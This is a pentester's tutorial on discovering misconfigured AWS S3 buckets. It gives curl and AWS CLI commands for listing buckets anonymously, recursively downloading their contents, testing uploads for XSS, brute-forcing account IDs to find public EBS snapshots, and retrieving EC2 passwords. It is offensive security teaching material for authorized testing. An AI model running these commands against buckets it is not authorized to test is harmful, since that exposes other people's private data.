AWS S3 for Pentesters

Discovering and Exploiting Misconfiguration

Introduction

This article is intended for pentesters and security professionals who work with Amazon S3 buckets. It covers methods for discovering buckets, checking access permissions, and extracting data, as well as recommendations for securing them. Amazon S3 (Simple Storage Service) is a widely used object storage service for storing and retrieving data. Companies use S3 to store everything from static website content to backup data.

Disclaimer

This material is distributed for educational purposes. The author is not responsible for any misuse of the attack and exploitation methods described in the article. Lab data is used for the test and exploitation examples to avoid disclosing third-party data. The described methods apply not only to AWS S3 but also to most services that provide similar data storage capabilities and are compatible with the S3 API.

Overview of S3 Buckets

Amazon S3 is a scalable, high-speed, web-based cloud storage service designed for online backup and archiving of data and application programs. S3 buckets are containers for objects stored in Amazon S3. Each object is stored in a bucket, and an object consists of a file and, optionally, metadata that describes that file.

Uses in Infrastructure:

  • Static Website Hosting: host static websites, including HTML, CSS, and JavaScript files;
  • Backup and Restore: store backup copies of critical data;
  • Data Archiving: store infrequently accessed data;
  • Big Data Analytics: store and analyze large amounts of data.

A bucket is created in a single region, chosen from the many available ones. There are several ways to determine the region of a bucket: for example, request https://s3.amazonaws.com/<bucket>, and the service will return the bucket's address with the region ID in the body of the response and/or in the x-amz-bucket-region header of the response. If web access to the metadata is restricted and the header is missing from the response, you can try the --region <regionId> option of the AWS CLI client, iterating through all region IDs. Alternatively, you can use public resources that aggregate data on open buckets or use off-the-shelf tools for active brute-force searches. Read more about such resources and tools in the section "Pentest S3 Resources".
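
A quick way to check is to request the global endpoint with curl and inspect the response headers (a sketch; <bucket> is a placeholder for the target bucket name):

curl -sI "https://s3.amazonaws.com/<bucket>" | grep -i x-amz-bucket-region
# e.g.: x-amz-bucket-region: eu-west-1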

Configure the Environment

Install the AWS CLI and set up an account. I strongly discourage using AWS administrator IAM credentials; it is better to create a separate IAM user with minimal access rights to S3.
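
If the AWS CLI is not installed yet, the official v2 bundle can be used; a sketch for Linux x86_64 (see the AWS documentation for other platforms):

curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install
aws --version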

A quick tutorial on how to set up an account:

  1. Open console.aws.amazon.com/iam/home#/policies/create, and go to the JSON tab to add the following permissions:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::*",
                "arn:aws:s3:::*/*"
            ]
        }
    ]
}
  2. Specify the name "S3MinimalAccessPolicy" for the new policy;
  3. Open console.aws.amazon.com/iam/home#/users/create and create a new user (set a name like s3-minimal-access);
  4. On the "Set permissions" page, select "Attach existing policies directly", then search for and select the previously created policy S3MinimalAccessPolicy;
  5. After creating the temp user, you will have access to the "Security Credentials" section. Create access credentials via "Create access key". Save the Access key ID and Secret access key in a secure location, or immediately configure the AWS client by running aws configure (see the example session after this list);
  6. Check that the client is configured correctly:
 aws sts get-caller-identity
 {
 	"UserId": "AIDAZQ3DPQMXP6W6BPURI",
 	"Account": "654654276398",
 	"Arn": "arn:aws:iam::654654276398:user/s3-minimal-access"
 }
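
For reference, a typical aws configure session looks like this (the values below are placeholders, not real credentials):

aws configure
AWS Access Key ID [None]: AKIA................
AWS Secret Access Key [None]: ****************************************
Default region name [None]: us-east-1
Default output format [None]: json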

Pentest S3 Resources

Some services scan the Internet for open/accessible buckets and provide access to them via the web, for example, https://buckets.grayhatwarfare.com/

You can also use local tools that brute-force bucket names with dictionaries and mutations, sending queries to the bucket provider's endpoints (AWS or any other S3-compatible service).

Remember that a bucket is hosted in, and accessible from, a single region. Pay attention to the `x-amz-bucket-region` header in the service's response, or request `https://s3.amazonaws.com/<bucket_name>` (the response will contain either an access error or the name of the region needed to reach the bucket). Once you know the region name, you can check direct access:
`https://s3.<region_name>.amazonaws.com/<bucket_name>`
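
If the header is stripped, you can simply loop over region IDs and see where the bucket answers (a minimal sketch; the region list is shortened and <bucket_name> is a placeholder):

for region in us-east-1 us-east-2 us-west-1 us-west-2 eu-west-1 eu-central-1 ap-southeast-1; do
  code=$(curl -s -o /dev/null -w '%{http_code}' "https://s3.${region}.amazonaws.com/<bucket_name>")
  echo "${region}: ${code}"   # 301 = wrong region, 200/403 = bucket lives here
done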

Misconfigurations

Anonymous Access

This type of misconfiguration occurs when public access is enabled in the bucket settings and access to metadata is not disabled. For example, the resource owner might have intended that certain data be publicly accessible, such as static files for a website (e.g., JS, images, videos, etc.) or archives, using direct links to the files on the site. The misconfiguration happens when the resource owner does not disable anonymous access to the metadata, which contains the bucket’s name and a list of all files in the bucket. You can test for this misconfiguration in the following ways:

curl http://<bucket>.s3.amazonaws.com/
curl http://s3.amazonaws.com/<bucket>
aws s3 ls s3://<bucket>/ --no-sign-request
aws s3 ls https://<URL>/ --no-sign-request

The `--no-sign-request` option sends the request anonymously, without AWS authorization. In real projects, we have seen buckets where access was denied to authorized AWS users, yet anonymous access was enabled due to an error in configuring access rights to the resource.

Access with AWS Authorization

The opposite of the previous misconfiguration: a resource owner disables anonymous access to the bucket but enables access for all authorized AWS users, mistakenly thinking that this applies only to users or employees of their own organization. A configured AWS client is sufficient to test and exploit this misconfiguration:

aws s3 ls s3://<domain>/
aws s3 ls https://<domain>/

Access through a Proxy Site

The third type of misconfiguration differs from the previous ones in the connection point. Many resource owners prefer to proxy access to the bucket through their own domain/site/server and close off direct connections. If the proxy is configured incorrectly, access to the bucket's contents or structure can be gained via its metadata. You can use the `--endpoint-url <url>` parameter to check access, for example:

aws s3 ls --endpoint-url http://<site/domain>/<path>  # get the bucket name
aws s3 ls --endpoint-url http://<site/domain>/<path> s3://<bucket>
# don't forget to check with the `--no-sign-request` parameter

This kind of misconfiguration is quite common, and even if you can’t find the name of the bucket, you can try to brute-force possible valid values by dictionary search.
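
A minimal sketch of such a dictionary search, assuming a wordlist names.txt with candidate bucket names (both the wordlist and the endpoint are placeholders):

while read -r name; do
  if aws s3 ls --endpoint-url "http://<site/domain>/<path>" "s3://${name}" --no-sign-request >/dev/null 2>&1; then
    echo "[+] valid bucket: ${name}"
  fi
done < names.txt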

Post Exploitation

Extract the Content from the S3 Bucket

After accessing the bucket and retrieving metadata contents via the AWS CLI, you can run a recursive download of the entire contents or a specific path/file using the following commands:

aws s3 cp s3://<bucket>/ . --recursive
aws s3 cp s3://<bucket>/path/filename .

In addition, you may want to check for the possibility of uploading HTML/JS files to a bucket for XSS attacks or other purposes:

echo 'TEST' > TEST
aws s3 cp TEST s3://<bucket>/TEST
curl http://s3.<region>.amazonaws.com/<bucket>/TEST

If the bucket is accessed via a proxy, or there are other restrictions preventing direct access via the AWS CLI, you can send the listing parameters in a plain GET request to retrieve the data structure.
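
For example, a listing can often be pulled with the standard S3 ListObjectsV2 query parameters (a sketch; the host and path are placeholders for the proxied endpoint):

# list up to 1000 keys
curl "http://<site/domain>/<path>/?list-type=2&max-keys=1000"
# narrow the listing to a prefix (pseudo-directory)
curl "http://<site/domain>/<path>/?list-type=2&prefix=backups/"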

Get Public Snapshots EBS (Elastic Block Store)

With access to the bucket, we can brute-force the AWS account ID and check for unprotected EBS snapshots; the technique has been covered in several public write-ups.

The following is a copy-paste example for a quick check:

1) Verify that you have a valid AWS account with the root/admin role for creating a temp user:

aws sts get-caller-identity
{
    "UserId": "257143927464",
    "Account": "257143927464",
    "Arn": "arn:aws:iam::257143927464:root"
}

2) Create a new AWS user for your organization:

aws iam create-user --user-name LeakyBucketUser

3) Create a role for the temp user:

aws iam create-role --role-name LeakyBucket --assume-role-policy-document '{
	"Version": "2012-10-17",
	"Statement": [
    	{
        	"Effect": "Allow",
        	"Principal": {
            	"AWS": "arn:aws:iam::257143927464:user/LeakyBucketUser"
        	},
        	"Action": "sts:AssumeRole"
    	}
	]
}'

4) Create an inline policy on the role granting access to S3 (scoped to the target bucket name), and attach an S3 read-only policy to the temp user:

aws iam put-role-policy --role-name LeakyBucket --policy-name S3AccessPolicy --policy-document '{
	"Version": "2012-10-17",
	"Statement": [
    	{
        	"Effect": "Allow",
        	"Action": [
            	"s3:GetObject",
            	"s3:ListBucket"
        	],
        	"Resource": [
            	"arn:aws:s3:::mega-big-tech",
            	"arn:aws:s3:::mega-big-tech/*"
        	]
    	}
	]
}'
aws iam attach-user-policy --user-name LeakyBucketUser --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

5) Request the access credentials of the created user and configure the profile:

aws iam create-access-key --user-name LeakyBucketUser
aws configure --profile leakybucketuser
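
create-access-key returns the new credentials as JSON; the fields you need are AccessKeyId and SecretAccessKey (the values below are placeholders):

{
    "AccessKey": {
        "UserName": "LeakyBucketUser",
        "AccessKeyId": "AKIA................",
        "Status": "Active",
        "SecretAccessKey": "****************************************",
        "CreateDate": "2024-01-01T00:00:00+00:00"
    }
}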

6) Install the account ID brute-force tool for the target bucket and run it:

pipx install s3-account-search
aws sts get-caller-identity --profile leakybucketuser
s3-account-search --profile leakybucketuser arn:aws:iam::257143927464:role/LeakyBucket <bucket_name>
> 107513503799

Once we have the account ID, we can proceed to check for public snapshots. To do this, log in to the AWS Management Console and change the region to the region of the target bucket, for example, https://us-east-1.console.aws.amazon.com/ec2/home 

Then, search for the EC2 service, click the service, and in the EC2 dashboard, in the left-hand menu, select Snapshots under the Elastic Block Store menu item. In the dropdown list, select Public Snapshots, paste the discovered AWS account ID into the field, and hit enter.

Or use a direct link by substituting the values: https://us-east-1.console.aws.amazon.com/ec2/home?region=us-east-1#Snapshots:visibility=public;v=3;ownerId=107513503799 
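
The same check can also be done from the AWS CLI with describe-snapshots, filtering by the discovered owner account ID (a sketch using the region and account ID from the example above):

aws ec2 describe-snapshots \
  --owner-ids 107513503799 \
  --restorable-by-user-ids all \
  --region us-east-1 \
  --query 'Snapshots[].[SnapshotId,VolumeSize,Description]' \
  --output table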

After all manipulations, you can delete the temporary user and associated roles/policies:

aws iam list-attached-user-policies --user-name LeakyBucketUser
aws iam detach-user-policy --user-name LeakyBucketUser --policy-arn "arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess"
aws iam delete-role-policy --role-name LeakyBucket --policy-name S3AccessPolicy
aws iam delete-role --role-name LeakyBucket
aws iam delete-user --user-name LeakyBucketUser

Cheat Sheet

A small cheat sheet that may be useful in addition to the previous commands/methods:

# Identity and Access Management (IAM)
aws sts get-caller-identity  # whoami
aws iam list-attached-user-policies --user-name contractor  # list attached policies by username
aws iam get-policy --policy-arn arn:aws:iam::427648302155:policy/Policy  # get policy metadata, incl. default version id
aws iam get-policy-version --policy-arn arn:aws:iam::427648302155:policy/Policy --version-id v4  # get policy by version

# Get S3 policy for a bucket
aws s3api get-bucket-policy --bucket <bucket_name>

# Check EC2 instances
aws ec2 describe-instances --filters Name=instance-state-name,Values=running --query 'Reservations[].Instances[].[Tags[?Key==`Name`].Value | [0],InstanceId,Platform,State.Name,PrivateIpAddress,PublicIpAddress,InstanceType,PublicDnsName,KeyName]'

# Get EC2 password
aws ec2 get-password-data --instance-id i-04cc1c2c7ec1af1b5 --priv-launch-key it-admin.pem

Author: @resource_not_found